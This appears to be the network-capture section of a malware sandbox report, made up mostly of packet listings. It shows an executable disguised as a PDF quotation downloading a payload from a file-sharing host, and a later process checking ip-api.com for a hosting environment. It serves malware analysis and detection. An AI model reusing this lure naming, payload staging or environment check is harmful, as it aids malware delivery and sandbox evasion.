                                                  Apr 23, 2024 14:44:58.423434019 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423470020 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423474073 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423489094 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423506975 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423511982 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423532009 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423536062 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423568010 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423578978 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423588037 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423623085 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423635960 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423639059 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423649073 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423657894 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423664093 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423686028 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423690081 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423702955 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423711061 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423737049 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423749924 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423755884 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423773050 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423799992 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423804045 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423814058 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423826933 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423826933 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423867941 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423872948 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423877954 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423906088 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423912048 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423933029 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423933029 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423940897 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423966885 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.423970938 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423993111 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.423995972 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424004078 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424021959 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424021959 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424063921 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424077988 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424082041 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424088001 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424112082 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424148083 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424149990 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424155951 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424189091 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424191952 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424206972 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424216032 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424237967 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424242973 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424263954 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424266100 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424272060 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424288988 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424288988 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424313068 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424316883 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424329042 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424339056 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424341917 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424381018 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424395084 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424402952 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424407959 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424432039 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424460888 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424477100 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424599886 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424609900 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424618006 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424624920 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424638033 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424649000 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424664021 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424668074 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424689054 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424695969 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424710035 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424717903 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424727917 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424747944 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424760103 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424761057 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424794912 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424798965 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424808025 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424820900 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424824953 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424850941 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424854994 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424863100 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424875021 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424885035 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424899101 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424904108 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424920082 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424926043 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424932957 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424959898 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.424963951 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424978018 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.424993038 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425040960 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425055981 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425057888 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425057888 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425065041 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425074100 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425095081 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425101042 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425112963 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425127983 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425132036 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425153971 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425158024 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425167084 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425193071 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425196886 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425204039 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425215960 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425223112 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425263882 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425266981 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425271988 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425306082 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425308943 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425326109 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425337076 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425350904 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425378084 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425395012 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425399065 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425438881 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425441980 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425456047 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425465107 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425479889 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425484896 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425504923 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425507069 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425513983 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425532103 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425535917 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425553083 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425558090 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425561905 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425580978 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425585032 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425602913 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425607920 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425612926 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425630093 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425635099 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425654888 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425657034 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425663948 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425681114 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425684929 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425708055 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425712109 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425724030 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425735950 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425740957 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425765991 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425776958 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425786018 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425791025 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425815105 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425823927 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425837040 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425848007 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425852060 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425875902 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425903082 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425925016 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425931931 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425941944 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425951958 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425952911 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425966024 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.425980091 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.425983906 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426009893 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426023960 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.426026106 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426034927 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426050901 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.426060915 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426073074 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426079035 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.426083088 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426101923 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426104069 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.426142931 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.426146984 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426167965 CEST44349738104.21.13.139192.168.2.4
                                                  Apr 23, 2024 14:44:58.426201105 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.426614046 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.427186966 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:44:58.429413080 CEST49738443192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:45:52.523544073 CEST4973680192.168.2.4104.21.13.139
                                                  Apr 23, 2024 14:45:53.018330097 CEST4974680192.168.2.4208.95.112.1
                                                  Apr 23, 2024 14:45:53.136383057 CEST8049746208.95.112.1192.168.2.4
                                                  Apr 23, 2024 14:45:53.136615992 CEST4974680192.168.2.4208.95.112.1
                                                  Apr 23, 2024 14:45:53.136806965 CEST4974680192.168.2.4208.95.112.1
                                                  Apr 23, 2024 14:45:53.256021976 CEST8049746208.95.112.1192.168.2.4
                                                  Apr 23, 2024 14:45:53.306196928 CEST4974680192.168.2.4208.95.112.1
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 23, 2024 14:44:54.184787989 CEST5255053192.168.2.41.1.1.1
                                                  Apr 23, 2024 14:44:54.291816950 CEST53525501.1.1.1192.168.2.4
                                                  Apr 23, 2024 14:44:55.738305092 CEST5036953192.168.2.41.1.1.1
                                                  Apr 23, 2024 14:44:55.846015930 CEST53503691.1.1.1192.168.2.4
                                                  Apr 23, 2024 14:45:52.897466898 CEST5080153192.168.2.41.1.1.1
                                                  Apr 23, 2024 14:45:53.002528906 CEST53508011.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Apr 23, 2024 14:44:54.184787989 CEST192.168.2.41.1.1.10x6723Standard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                                  Apr 23, 2024 14:44:55.738305092 CEST192.168.2.41.1.1.10xb6f3Standard query (0)s22.filetransfer.ioA (IP address)IN (0x0001)false
                                                  Apr 23, 2024 14:45:52.897466898 CEST192.168.2.41.1.1.10x6e70Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Apr 23, 2024 14:44:54.291816950 CEST1.1.1.1192.168.2.40x6723No error (0)filetransfer.io104.21.13.139A (IP address)IN (0x0001)false
                                                  Apr 23, 2024 14:44:54.291816950 CEST1.1.1.1192.168.2.40x6723No error (0)filetransfer.io172.67.200.96A (IP address)IN (0x0001)false
                                                  Apr 23, 2024 14:44:55.846015930 CEST1.1.1.1192.168.2.40xb6f3No error (0)s22.filetransfer.io104.21.13.139A (IP address)IN (0x0001)false
                                                  Apr 23, 2024 14:44:55.846015930 CEST1.1.1.1192.168.2.40xb6f3No error (0)s22.filetransfer.io172.67.200.96A (IP address)IN (0x0001)false
                                                  Apr 23, 2024 14:45:53.002528906 CEST1.1.1.1192.168.2.40x6e70No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                  • filetransfer.io
                                                  • s22.filetransfer.io
                                                  • ip-api.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449736104.21.13.139805356C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                                                  TimestampBytes transferredDirectionData
                                                  Apr 23, 2024 14:44:54.403248072 CEST95OUTGET /data-package/aPtWC5T9/download HTTP/1.1
                                                  Host: filetransfer.io
                                                  Connection: Keep-Alive
                                                  Apr 23, 2024 14:44:54.734833002 CEST819INHTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 23 Apr 2024 12:44:54 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Location: https://filetransfer.io/data-package/aPtWC5T9/download
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ibr1mN5bNQIfT53MxXQJv07tywcrJ3Ae%2BmVXg8FSudFxPqI%2F%2BH2QKNQWsEnQ0h9I2ITXwPboJY1ArLzCP7yji5JMn3OHIcgo%2Bwe%2Fu73F5bRma85QlH5%2BiYsNOMrwAoBAxfQ%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 878df2985ed16782-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                  Apr 23, 2024 14:44:54.734872103 CEST5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449746208.95.112.1807700C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                  TimestampBytes transferredDirectionData
                                                  Apr 23, 2024 14:45:53.136806965 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Apr 23, 2024 14:45:53.256021976 CEST174INHTTP/1.1 200 OK
                                                  Date: Tue, 23 Apr 2024 12:45:52 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 5
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 74 72 75 65 0a
                                                  Data Ascii: true


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449737104.21.13.1394435356C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-23 12:44:55 UTC95OUTGET /data-package/aPtWC5T9/download HTTP/1.1
                                                  Host: filetransfer.io
                                                  Connection: Keep-Alive
                                                  2024-04-23 12:44:55 UTC1051INHTTP/1.1 302 Found
                                                  Date: Tue, 23 Apr 2024 12:44:55 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  X-Powered-By: Nette Framework 3
                                                  X-Frame-Options: SAMEORIGIN
                                                  Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                  Set-Cookie: PHPSESSID=oh1n5n3g82js5n44tbobj9n913; expires=Tue, 07-May-2024 12:44:55 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  Vary: X-Requested-With
                                                  Location: https://s22.filetransfer.io/storage/download/fNtpaSFzWEzZ
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hy%2B1wtVmMxGwQKekRkOULXXyJ%2BOnZuPv9Yn2QGbiE1079N26Cg0OJPTHfyGC9vFoFEczA7j6HCTsGWXeUjICowHcPZ8XMtTt14VLfsjrSyNgldZPfNYnWOGuTosfGn5lgLw%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 878df29ccee253f6-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-23 12:44:55 UTC134INData Raw: 38 30 0d 0a 3c 68 31 3e 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 0a 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 32 2e 66 69 6c 65 74 72 61 6e 73 66 65 72 2e 69 6f 2f 73 74 6f 72 61 67 65 2f 64 6f 77 6e 6c 6f 61 64 2f 66 4e 74 70 61 53 46 7a 57 45 7a 5a 22 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 68 65 72 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a
                                                  Data Ascii: 80<h1>Redirect</h1><p><a href="https://s22.filetransfer.io/storage/download/fNtpaSFzWEzZ">Please click here to continue</a>.</p>
                                                  2024-04-23 12:44:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449738104.21.13.1394435356C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-23 12:44:56 UTC98OUTGET /storage/download/fNtpaSFzWEzZ HTTP/1.1
                                                  Host: s22.filetransfer.io
                                                  Connection: Keep-Alive
                                                  2024-04-23 12:44:56 UTC1058INHTTP/1.1 200 OK
                                                  Date: Tue, 23 Apr 2024 12:44:56 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 9052214
                                                  Connection: close
                                                  Last-Modified: Mon, 22 Apr 2024 08:59:18 GMT
                                                  Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                  Set-Cookie: PHPSESSID=49ffa41de395a046ce3b9dd0a0215520; expires=Tue, 07-May-2024 12:44:56 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Content-Disposition: attachment; filename="Jmoilxieddb.vdf"
                                                  Accept-Ranges: bytes
                                                  Accept-Ranges: bytes
                                                  ETag: "662626e6-8a2036"
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rt73jCno6SkDZz1bXRGaujXOsVOtyNPbDAr9rQjE8KntK2L1CLI6fECCM191mnOSxvwNcRQyXqAyFCCx4iJbKZRg45JohF5jmDIWt3bZEnOd%2Fq8qD5dH%2B5ovIMJozxesHyH2EVu%2F"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 878df2a39cc96783-ATL
                                                  alt-svc: h3=":443"; ma=86400
